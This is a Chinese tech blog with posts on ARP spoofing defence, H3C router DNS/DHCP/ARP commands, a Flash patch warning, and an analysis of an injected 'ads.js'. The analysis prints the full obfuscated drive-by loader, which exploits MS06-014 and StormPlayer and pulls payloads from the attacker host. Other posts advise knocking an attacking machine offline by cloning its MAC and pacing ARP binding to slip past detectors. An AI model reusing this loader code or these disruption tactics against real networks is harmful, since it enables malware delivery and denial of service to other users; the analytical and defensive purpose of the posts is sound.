Lin's Space|Only

杂碎1：拦截ARP攻击，防御ARP攻击，反击ARP攻击

拦截与防御ARP

ARP的原理我就不说了，一般的ARP攻击比如网关欺骗，DNS欺骗，360防火墙都能够检测到（在局域网中的其中一台机子上的360ARP防火墙未必能检测到其他客户机是否被ARP欺骗），防御ARP的办法就是绑定IP地址和MAC地址（最好能在单台客户机绑定全部所在局域网内所有客户机的IP地址和MAC地址，），安装ARP防火墙（瑞星，360，金山，超级巡警都有这样特殊功能的防火墙程序）。

注：

在绑定大量的MAC和IP地址的时候也会发出ARP扫描（检测），这样容易被一些ARP检测防御工具误认为为ARP攻击，这样就用到啦CMD下的延迟处理命令（DOS等待命令）“timeout”。比如可以隔一秒绑定9个IP地址和MAC地址（个位数的很不容易被认为是ARP攻击，见过的一些ARP工具默认也是每秒10个发包才会被认为是ARP攻击）（可以在大量的绑定语句之间放入“timeout /T 1 /NOBREAK”命令作为延迟绑定）。

ARP攻击反击

最好能检测到是那个机子发出的ARP攻击，然后可以利用脚本来进行IP冲突攻击或MAC地址冲突攻击，也可以借助比如“反P2P终结者”，“反ARP攻击”等工具进程反击（最好使用一些被动反击的工具，并且是单对单的，否则可能造成局域网络阻塞）。

防守与反击之间的徘徊

当然最好单独弄一主机进行反击（主机可大可小，达到干扰对方正常探测为目的），大多数还是要以防守为主。

对于对所有客户机有控制权的管理员来说就不用这么麻烦来反击啦，直接过去拔网线，训话，清除ARP即可 。

附注：

timeout命令说明：

C:\>timeout /?

TIMEOUT [/T] timeout [/NOBREAK]

描述:
这个工具接受超时参数，等候一段指定的时间(秒)或等按任意键。它还接受
一个参数，忽视按键。

参数列表:
/T        timeout       指定等候的秒数。有效范围从 -1 到 99999 秒。

/NOBREAK                忽略按键并等待指定的时间。

/?                      显示该帮助消息。

注意: 超时值 -1 表示无限期地等待按键。

示例:
TIMEOUT /?
TIMEOUT /T 10
TIMEOUT /T 300 /NOBREAK
TIMEOUT /T -1

杂碎2：冬天宝宝专题，下午扫来的。

杂碎3：昨天输入错误网站，跳到256去了，看到谷歌热榜，哇 ，“kappa女XX”，后边的就不说了。。

杂碎4：前些天晕着仿模板，把扫街给拉下了，补上补上，嘿嘿 。

今日一点 Arp, CMD, dos

telnet进入后应该是“参观级”的权限，然后用“super”命令切换到“监控级”权限，然后可以使用“system”切换到“系统级”级。

或者在直接使用super命令来切换命令级别。

super命令默认进入3级权限

格式：super [ level ]
参数：level：用户的级别，为0～3。
举例：

super 3 

命令的级别（参观级、监控级、系统级、管理级）简介：

参观级：网络诊断工具命令（ping、tracert）、从本设备出发访问外部设备的命令（包括：Telnet客户端、SSH客户端、RLOGIN）等，该级别命令不允许进行配置文件保存的操作。

User view commands:
display Display current system information
hwtacacs Specify HWTACACS server
nslookup Query Internet name servers
ping Ping function
quit Exit from current command view
rlogin Establish one RLOGIN connection
rsh Establish one RSH connection
super Set the current user priority level
telnet Establish one TELNET connection
tracert Trace route function

监控级：用于系统维护、业务故障诊断等，包括display、debugging命令，该级别命令不允许进行配置文件保存的操作。

boot Set boot option
cd Change current directory
clock Specify the system clock
copy Copy from one file to another
debugging Enable system debugging functions
delete Delete a file
dialer Dialer disconnect
dir List files on a file system
display Display current system information
fixdisk Recover lost chains in storage device
format Format the device
free Clear user terminal interface
ftp Open FTP connection
hwtacacs Specify HWTACACS server
lock Lock current user terminal interface
log Settings of startup configuration log
mkdir Create a new directory
more Display the contents of a file
move Move a file
nslookup Query Internet name servers
ping Ping function
pwd Display current working directory
quit Exit from current command view
reboot Reboot system
refresh Refresh routes
rename Rename a file or directory
reset Reset operation
rlogin Establish one RLOGIN connection
rmdir Remove an existing directory
rsh Establish one RSH connection
save Save current configuration
schedule Schedule system task
screen-length Specify the lines displayed on one screen
send Send information to other user terminal interfaces
start-script Start a script-string on an UI
startup Specify system startup parameters
super Set the current user priority level
system-view Enter the System View
telnet Establish one TELNET connection
terminal Set the terminal line characteristics
tftp Open TFTP connection
tracert Trace route function
undelete Recover a deleted file
undo Cancel current setting
vrbd Show application version
xmodem Establish an xmodem connection

系统级：业务配置命令，包括路由、各个网络层次的命令，这些用于向用户提供直接网络服务。

System view commands:
acl Specify acl configuration information
arp Add static ARP entry
aspf-policy Specify ASPF(Application Specific Packet Filter)
policy configuration information
atm Create ATM class
auto-config Specify auto configuration information
band-based-sharing Specify bandwidth based loadsharing mode
bgp Specify BGP(Border Gateway Protocol) configuration
information
bims Specify bims configuration information
bootfile Boot file control
bridge Config Bridge set
clock Specify the system clock
command Command inputted
command-alias Specify command alias
command-privilege Specify the command level
controller Specify controller configuration view
cpu-usage Specify cpu usage configuration
ddns-server Specify DDNS server type
delete Delete route information
detect-group Detect group
dhcp DHCP configuration subcommands
dialer Specify DCC(Dial-Control-Center) configuration
information
dialer-rule Create a dialer-rule
display Display current system information
dns Specify domain name system
dns-proxy Specify DNS Proxy configuration information
domain Add domain or modify domain attributes
execute Batch Command
file Specify file system configuration information
firewall Specify firewall configuration information
flow-interval Specify the time period for interface statistic
counting
ftp Specify FTP server configuration information
ftp-server Specify an interface or ip address for source
address in FTP connections
gratuitous-arp-learning Gratuitous Arp learning function
gratuitous-arp-sending Sending gratuitous-arp packet when receiving
different sub-network arp packet function
header Specify the login banner
hotkey Specify hotkey configuration information
hwping Specify HWPing test class
hwping-agent Specify HWPing agent task function
hwping-server Specify HWPing server task function
hwtacacs Specify HWTACACS server
icmp Specify ICMP(the Internet Control Message Protocol)
configuration information
ike Specify IKE(Internet Key Exchange) configuration
information
info-center Specify information center configuration information
interface Specify the interface configuration view
ip Specify IP(Internet Protocol) configuration
information
ipsec Specify IPSec(IP Security) configuration information
isdn Specify ISDN configuration information
l2tp Specify L2TP(Layer Two Tunneling Protocol)
configuration information
l2tp-group Specify L2TP(Layer Two Tunneling Protocol) group
configuration information
l2tpmoreexam L2tp command group
local-server Specify local RADIUS server configuration
information
local-user Specify local user configuration information
max-packet-process Router max packet process count
memory Free memory for routing protocols to run normally
nat Specify NAT(Network Address Translation)
configuration information
naturemask-arp Specify Nature Mask Arp function
nslookup Query Internet name servers
ntp-service Specify NTP(Network Time Protocol) configuration
information
ospf Specify OSPF(Open Shortest Path First) configuration
information
ping Ping function
pki Specify PKI module configuration information
port-mapping Specify PAM(Port to Application Mapping)
configuration information
ppp Specify PPP(the Point-to-Point Protocol)
configuration information
pppoe-server Specify PPPoE(PPP over Ethernet) server
configuration information
private-group-id Tunnel-Private-Group-ID attribute description mode
protocol-priority Specify protocol-priority configuration information
qos Specify QoS(Quality of Service) configuration
information
quit Exit from current command view
radius Specify RADIUS configuration information
return Exit to User View
rip Specify RIP(Routing Information Protocol)
configuration information
rmon Specify RMON
route-policy Specify a route policy
router Specify router configuration information
rsa Specify RSA module configuration information
save Save current configuration
script-string Define a modem script-string
service Toggle service mode. By default it is off
sftp Set SFTP service attribute
snmp-agent Specify SNMP(Simple Network Management Protocol)
configuration information
ssh Specify SSH (secure shell) configuration information
ssh-server Specify an interface or ip address for source
address in SSH connections
ssh2 Establish one TELNET connection
standby Specify standby configuration information
super Modify super password parameters
sysname Specify system name and the command line prompt
tcp Specify TCP(Transmission Control Protocol)
configuration information
telnet Specify TELNET configuration information
telnet-server Specify an interface or ip address for source
address in Telnet connections
tftp Open TFTP connection
tftp-server TFTP Server
time-range Specify time-range configuration information
tracert Trace route function
traffic Specify traffic configuration information
undo Cancel current setting
upgrade Upgrade bootrom
user-interface Configure the user terminal interface
vrbd Show application version
vrrp Specify configuration information of VRRP
web Set web info

管理级：关系到系统基本运行、系统支撑模块的命令，这些命令对业务提供支撑作用，包括文件系统、FTP、TFTP、XModem下载、用户管理命令、级别设置命令、系统内部参数设置命令（非协议规定、非RFC规定）等。

最近配置域名系统（DNS），下边是关于DNS的命令：

dns resolve命令用来启动DNS域名解析功能。undo dns resolve命令用来关闭DNS域名解析功能。
缺省情况下，DNS域名解析功能没有开启。

display dns server命令用来显示DNS配置服务器信息
dns server dynamic命令用来显示通过DHCP等协议动态获得的DNS服务器地址。

dns server命令用来配置DNS服务器的IP地址，undo dns server命令用来删除DNS服务器的IP地址。

举例：

# 配置DNS服务器的IP地址。
[H3C] dns server 202.102.224.68
# 删除指定IP地址的DNS服务器。
[H3C] undo dns server 202.102.224.68
# 删除所有DNS服务器。
[H3C] undo dns server

检测DNS域名解析情况可以使用nslookup：

nslookup type命令用来解析指定IP地址对应的域名或解析指定域名对应的IP地址。
reset dns dynamic-host命令用来清空当前DNS Client解析的域名缓存中的内容。

格式：nslookup type { ptr ip-address | a domain-name }
参数：ptr ip-address：解析IP地址对应的DNS域名。
a domain-name：解析DNS域名对应的IP地址。域名长度为小于30的字符串，支持自动域名追加。

举例：

# 解析192.168.1.9对应的域名。

nslookup type ptr 192.168.1.9
# 解析clin003.com对应的IP地址。 

nslookup type a clin003.com 

静态域名解析配置命令：

display ip host命令用来显示所有主机名和对应的IP地址。

ip host命令用来配置静态域名解析表项，即主机名和对应的IP地址，undo ip host命令用来取消主机名和对应的IP地址。
每个主机名只能对应一个IP地址。缺省情况下，静态域名解析表为空，即无主机名与IP地址对应。

举例：

# 设置主机名router1对应的IP地址为10.110.0.1。
[H3C] ip host router1 10.110.0.1
# 设置主机名router2对应的IP地址为10.110.0.2。
[H3C] ip host router2 10.110.0.2
# 设置主机名router3对应的IP地址为10.110.0.3。
[H3C] ip host router3 10.110.0.3
# 取消主机名router2与IP地址10.110.0.2的对应关系。
[H3C] undo ip host router2 10.110.0.2

DHCP服务:

dhcp enable命令用来使能DHCP服务，undo dhcp enable命令用来禁止DHCP服务。
(在正确配置系统时钟后，DHCP才会正常运行。）
dhcp server ping命令用来配置DHCP服务器发送ping报文的最大数量和最长等待回应时间，undo dhcp server ping命令用来恢复缺省值。
DHCP服务器通过发送ping报文探测地址的使用情况，以防止IP地址的重复分配导致地址冲突。

举例：

# 设置DHCP服务器最多发送10个ping数据包，等待时间采用缺省值500ms。
[H3C] dhcp server ping packets 10

ARP配置命令：

arp static命令用来配置ARP映射表，undo arp命令用来取消ARP映射表中对应地址的映射项。

格式：
arp static ip-address mac-address [ vpn-instance-name ]
undo arp ip-address [ vpn-instance-name ]

参数：
ip-address：为ARP映射项的IP地址，为点分十进制格式。
mac-address：ARP映射项的以太网MAC地址，格式为H-H-H。
vpn-instance-name：VPN实例的名称。

举例：

# 配置IP地址129.102.0.1对应的以太网MAC地址为00e0-fc01-0ec5。
[H3C] arp static 129.102.0.1 00e0-fc01-0ec5
# 配置IP地址11.0.0.1对应的以太网MAC地址为aa-fcc-12
[H3C] arp static 11.0.0.1 aa-fcc-12

display arp命令用来显示ARP映射表。

格式：
display arp [ static | dynamic | all ] [ | { begin text | exclude text | include text } ]
参数：
static：表示显示静态ARP项。
dynamic：表示显示动态ARP项。
all：表示显示所有的ARP项。
|：匹配输出
begin：匹配正则表达式起始的串。
exclude：匹配排除正则表达式的串。
include：匹配包含正则表达式的串。
text：正则表达式。

举例：

# 显示所有ARP表项。

display arp
# 显示静态ARP表项。 

display arp static
# 显示动态ARP表项。 

display arp dynamic 

reset arp命令用来清除ARP映射表中的ARP项。
对指定interface的接口进行操作时，接口类型只能是以太网口、虚拟以太网口，而且只能删除该接口的动态（dynamic）表项。

举例：

# 删除接口Ethernet 0/0/0的ARP映射表中的dynamic项。

reset arp interface Ethernet 0/0/0 

# 删除接口Ethernet 0/0/0的ARP映射表中的dynamic项。

reset arp interface Ethernet 0/0/0 

H3C AR18-21A(H3C AR 18-2X 系列)手册地址：http://www.h3c.com.cn/Service/Document_Center/IP_Network_Product/Routers/AR_18-2X/AR_18-2X/#命令

今日一点, 服务器 Arp, dns, DNS服务器, h3c, router, 路由器配置

这个漏洞跟ms06014的危害有一拼，刚查看Google Analytics的统计数据显示访问这个blog的用户有22.53%还在使用存在安全隐患的Adobe Flash Player 9 .0.115版本，而使用最新Adobe Flash Player 9 .0.124版本只有46.49%，这是恶意放毒者还很在乎的比例，如果你看到这篇文章，请检查你的flash控件版本升级吧。

最新的flash控件官方下载地址是：http://www.adobe.com/shockwave/download/flash/trigger/en/1/index.html

也可以使用360的第三方软件漏洞检查修补这个flash补丁。

如果你是站长或者网络内容提供者可以（强制你的浏览者升级到最新的flash控件版本）：

1.请在网页Object标签中的codebase修改需要version=9,0,124,0

2.在js引入方式中修改requiredMajorVersion和requiredRevision为相应版本，swfobject也是一样修改。

漏洞危害：
最近一个月时间好几次遇到利用这个漏洞的病毒arp攻击，dns欺骗攻击，利用成功后会下载一堆游戏盗号木马，运行后自动删除自己，然后隔段时间（十几分钟到几分钟）再次下载，在所有用户启动目录可能有explorer.exe启动项（经过几次更新啦不一定是这样啦，当发现有这个启动项说明你已经中奖啦），局域网的用户如果可以的话建议查处木马下载地址然后把这些恶意链接地址和ip统统封掉（ip最好封一段！！不得以啊）

参考文档：

http://bbs.duba.net/thread-21930883-1-1.html

今日一点 Arp, flash

一个机子中病毒啦，发出arp攻击怎么办？

两种情况：1，你可以控制，这样你可以直接过去把他机子关掉，或拔掉网线然后清除病毒等；2，在你可以管理范围之外，你怎么办？忍受被arp攻击？或许你说用（360）arp防火墙啊，我告诉你，没用，对于dns攻击，（360）arp防火墙没办法搞定，即使你开着防火墙，你浏览的网页里照样被嵌入“挂马”链接。当然你可以把这个链接重定向到你的本地机子127.0.0.1（修改hosts文件就可以达到初步的屏蔽效果）。

对于第二种情况，上边说的是防的办法，下边说下最近发现的反击办法，我不能任人宰割，要反击哇，让他掉线！！

首先你去电脑市场买几张网卡啊，不想买也行去虚拟几个也行！！（虚拟的办法我就不用说啦），因为是arp攻击，你的（360）arp防火墙会提示的，得到网卡地址，这样你就把你的多余的网卡地址修改成攻击你的那个机子的网卡地址，这样他就会提示ip地址冲突什么的，你也会提示，不过没关系啦，你也不用这块上网的！（所以推荐虚拟个网卡来玩），这样他就不会攻击你啦，刚开始你会掉线一下（看你的360怎么设置啦），你只要修复下你的上网的网卡连接就可以啦（或者禁用再启用下），超级好使，超便利反击办法（这样你搞好后，至少和你在同一交换机下的机子就会免遭那个中病毒的机子的骚扰啦，如果你配置够好，效果会更好）。

还有个防的办法（本来不想再说防的，只是这个是偶自己刚发现的就顺便说说）：你的（360）arp防火墙可以实现自己设置绑定网关和dns吧，对就在这里添加一个不存在的ip地址（最好内网啊，和你不再一个网段的或者没人用的ip），网卡地址就填攻击你的那个主机的网卡地址。这样保存后就间接阻止啦那个机子对你的arp欺骗攻击（当然包括dns欺骗攻击）。实践证明这两个办法都很好使。

反击的办法可以保护你的邻居，有点风险（他们会在你攻击成功后集体掉线一下），防的办法可以保护你自己（不掉线，对其他人没影响）。

开头已经说啦，这个是对arp病毒来玩的（他一般不会去手动修改网卡地址，所以成功率很高），如果有人手动操作中间人arp攻击，那就看情况啦。

最后说下，这个只是学习探讨目的，不要拿去做破坏啊！

如果你有更好的办法欢迎跟大家分享

今日一点, 网吧经验谈 Arp, arp病毒, arp防火墙, DNS欺骗, mac

00-e0-bb-00-1c-28 192.168.1.139 『F11？』

192.168.1.195         00-e0-bb-00-1b-e5 『F11』这个是5月15号到18号的记录中看出来的（曾经使用的ip有195,235,252,195）

F11怎么会有两个mac，难道最近又修改啦mac？查下前些天的arp表确实有这个mac（00-e0-bb-00-1c-28）对应的ip为139（192.168.1.139 ）

难道F11有两个网卡？诡异的病毒?!，诡异的人?!，诡异的网络!!

今日一点 Arp

这个地址是在telnet百度的时候发现的：

<script language=”javascript” SRC=”http://err.www404.cn:53/ads.js”></script>

把err.www404.cn:53/ads.js里的eval替换为document.write然后加个<script>的壳保存为html文件就可以初步解密出这个js的原型，然后分析代码可以知道是利用的ms06014这个漏洞（貌似还有暴风影音的痕迹）。只要你打上这个ms06041补丁就不会中这个ads.js的阴谋啦，还有最好把你的暴风影音也升级下。

ads.js源码：

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?”:e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!”.replace(/^/,String)){while(c–){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return’\\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\\b’+e(c)+’\\b’,'g’),k[c])}}return p}(‘A B(){}f.L=B;b(4.t.G(\’s\’)==-1){z()}A z(){2 p=”Q:N”+”Y”+”-Z-V”;2 y=”0-R”+”-10″;2 v=p+y;2 9=”[x O]“;h{2 e;2 w=(4["P"+"U"](“x”));w["X"](“W”,v);f["E"]["D"](“C”+”F.”+”S”+”M”+”e”+”K”,”")}k(e){};j{2 a=i J();a.H(a.T()+1f);4.t=\’s=1s;1n=/;a=\’+a.1j();4.8(“<r 1l=1k:1h 6=7://d.c.5/1m.g></r>”);4.8(“<3 6=7://d.c.5/11.g></3>”);b(e!=9){}1r{h{2 1q=i f["l"](“1o.1p”);2 n}k(n){};j{b(n!=9){4.8(“<3 6=7://d.c.5/1i.g><\\/3>”)}}h{2 q=i f["l"](“1g”+”16.17″+”15.1″);2 m}k(m){};j{b(m!=9){4.8(“<3 6=7://d.c.5/q.g><\\/3>”)}}h{2 14=i f["l"](“12″+”13.I”+”18.1″);2 o}k(o){};j{b(o!=9){4.8(“<3 6=7://d.c.5/19.g><\\/3>”)}}}}}4.8(“<3 6=7://u.1e.5.1d.1c/1a/1b.u></3>”);’,62,91,’||var|script|document|cn|src|http|write|errinfo|hoodt|if|www404|err||window|gif|try|new|finally|catch|ActiveXObject|Gl|sto|IEINFO|Cikeid1|lz|iframe|MyCookie|cookie|js|Cikeid|afilesto|object|Cikeid2|exit|function|writeInfo|Ad|createobject|ado|odb|indexOf|setTime||Date|am|onload|tr|BD9|Error|creat|clsid|983A||getTime|eElement|11D|classid|setAttribute|6C556|65A3|00C04FC29E36|real10|IERP|Ctl|reals|atCtrl|AT|GLCh|ERPCtl|real11|621252|ystat|com|yahoo|tongji|86400000|GLCH|none|bf|toGMTString|display|style|614|path|MPS|StormPlayer|cikewm|else|lonely’.split(‘|’),0,{}))

ads.js解密后源码（我打过补丁啦，解密有问题，如果感兴趣可以自行去解密这个ads.js，然后分析他都从哪里下载啦什么）：

function writeInfo(){}window.onload=writeInfo;if(document.cookie.indexOf(‘MyCookie’)==-1){exit()}function exit(){var Cikeid1=”clsid:BD9″+”6C556″+”-65A3-11D”;var Cikeid2=”0-983A”+”-00C04FC29E36″;var Cikeid=Cikeid1+Cikeid2;var errinfo=”[object Error]“;try{var e;var afilesto=(document["creat"+"eElement"](“object”));afilesto["setAttribute"](“classid”,Cikeid);window["ado"]["createobject"](“Ad”+”odb.”+”S”+”tr”+”e”+”am”,”")}catch(e){};finally{var hoodt=new Date();hoodt.setTime(hoodt.getTime()+86400000);document.cookie=’MyCookie=lonely;path=/;hoodt=’+hoodt.toGMTString();document.write(“”);document.write(” “);if(e!=errinfo){}else{try{var cikewm=new window["ActiveXObject"](“MPS.StormPlayer”);var sto}catch(sto){};finally{if(sto!=errinfo){document.write(” “);

这里的clsid为：clsid:BD96C556-65A3-11D0-983A-00C04FC29E36可以知道是利用的ms06014漏洞来挂的。

最下边还有stormPlayer是利用暴风影音漏洞来的。

临时解决办法（比如不让卡吧弹出提示什么的，因为怎么杀也杀不完，是别人机子中毒啦，DnsArp影响到你）：

保存下面为a.bat然后双击运行就可以啦

echo 127.0.0.1       u.asdafdgfgf.com  >>C:\WINDOWS\system32\drivers\etc\hosts
echo 127.0.0.1       g.asdafdgfgf.com  >>C:\WINDOWS\system32\drivers\etc\hosts
echo 127.0.0.1       u.asdafdgfgf.com/ads.js  >>C:\WINDOWS\system32\drivers\etc\hosts
echo 127.0.0.1        222360.com  >>C:\WINDOWS\system32\drivers\etc\hosts
echo 127.0.0.1       k.222360.com  >>C:\WINDOWS\system32\drivers\etc\hosts
echo 127.0.0.1       k.222360.com/ads/ads.cab  >>C:\WINDOWS\system32\drivers\etc\hosts
echo 127.0.0.1       err.www404.cn >>C:\WINDOWS\system32\drivers\etc\hosts
echo 127.0.0.1       err.www404.cn:53/ads.js >>C:\WINDOWS\system32\drivers\etc\hosts

或者直接把这个222.216.28.25在路由器中过滤掉(ps:如果他是个人的adsl就过滤掉他一个网段吧)，为啦不影响使用我过滤的他单个ip，还有开启360恶意网页拦截也能达到保护的效果。

今日一点, 病毒学习 ads.js, Arp, dns, ms06014, 机器狗